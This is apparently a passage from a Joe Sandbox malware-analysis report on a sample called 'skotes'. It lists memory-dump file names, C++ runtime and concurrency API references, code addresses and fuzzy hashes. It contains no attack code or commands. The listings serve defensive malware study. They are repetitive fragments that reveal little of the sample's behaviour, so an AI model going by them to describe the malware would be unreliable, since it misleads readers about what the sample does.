                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Concurrency::details::$Base::$Context$Virtual$DeactivateGroupInternalProcessorProcessor::ScheduleSchedulerSegment$ActiveAssignCommitConcurrency::location::_EventPointsReclaimReleaseRunnableSafeTraceTrigger
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1924466884-0
                                                                                                                                                                                            • Opcode ID: 27000fe145fe2c9386f2cd15cee087fcc30f86e5b0675d7706596ca31f4a7403
                                                                                                                                                                                            • Instruction ID: 40a3887f963a7c578bcae6112815877c525c58fc84a1ac0dcb2cc0f0f90d57fb
                                                                                                                                                                                            • Opcode Fuzzy Hash: 27000fe145fe2c9386f2cd15cee087fcc30f86e5b0675d7706596ca31f4a7403
                                                                                                                                                                                            • Instruction Fuzzy Hash: 1D414A35A00214EFCF44EF64D494AADB7B6FF48310F1880A9DD49AB382DB34A941CFA1
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • __Mtx_unlock.LIBCPMT ref: 00616ED1
                                                                                                                                                                                            • std::_Rethrow_future_exception.LIBCPMT ref: 00616F22
                                                                                                                                                                                            • std::_Rethrow_future_exception.LIBCPMT ref: 00616F32
                                                                                                                                                                                            • __Mtx_unlock.LIBCPMT ref: 00616FD5
                                                                                                                                                                                            • __Mtx_unlock.LIBCPMT ref: 006170DB
                                                                                                                                                                                            • __Mtx_unlock.LIBCPMT ref: 00617116
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Mtx_unlock$Rethrow_future_exceptionstd::_
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1997747980-0
                                                                                                                                                                                            • Opcode ID: cf20485061ea169c3453c9d7c4c739c8b027db89b2337077521c42fa3a72638f
                                                                                                                                                                                            • Instruction ID: 10031819e9e3c9690d415d62333673eaf218be29d61cc70a87ac1ada36065980
                                                                                                                                                                                            • Opcode Fuzzy Hash: cf20485061ea169c3453c9d7c4c739c8b027db89b2337077521c42fa3a72638f
                                                                                                                                                                                            • Instruction Fuzzy Hash: 17C1F1B1904744AFDB24DFB4C845BEEBBF6AF04310F08452DE81697791EB31A984CBA1
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • ListArray.LIBCONCRT ref: 00624538
                                                                                                                                                                                            • ListArray.LIBCONCRT ref: 0062456C
                                                                                                                                                                                            • Hash.LIBCMT ref: 006245D5
                                                                                                                                                                                            • Hash.LIBCMT ref: 006245E5
                                                                                                                                                                                              • Part of subcall function 00629C41: std::bad_exception::bad_exception.LIBCMT ref: 00629C63
                                                                                                                                                                                            • Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 0062474B
                                                                                                                                                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 006247A4
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ArrayHashList$AsyncConcurrency::details::Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorLibraryLoadRegisterTimerstd::bad_exception::bad_exception
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3010677857-0
                                                                                                                                                                                            • Opcode ID: bfa6ea7c0ceeaf8dc361002b624dbf92082f50c0829de65cb264147ed5fedaf9
                                                                                                                                                                                            • Instruction ID: ae9ef0b1f40fb4538fd51b8c54699e89df2c067874e8f3cf324029a71d0d45a8
                                                                                                                                                                                            • Opcode Fuzzy Hash: bfa6ea7c0ceeaf8dc361002b624dbf92082f50c0829de65cb264147ed5fedaf9
                                                                                                                                                                                            • Instruction Fuzzy Hash: FA815CB0A11B22BAD748DF74C845BD9FAA9BF09700F10431EF42897281DBB4A664CFD5
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0061ECED
                                                                                                                                                                                            • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 0061ED17
                                                                                                                                                                                              • Part of subcall function 0061F3DD: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 0061F3FA
                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 0061ED53
                                                                                                                                                                                            • Concurrency::details::EventWaitNode::Satisfy.LIBCONCRT ref: 0061ED94
                                                                                                                                                                                            • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0061EDC6
                                                                                                                                                                                            • __freea.LIBCMT ref: 0061EDEC
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
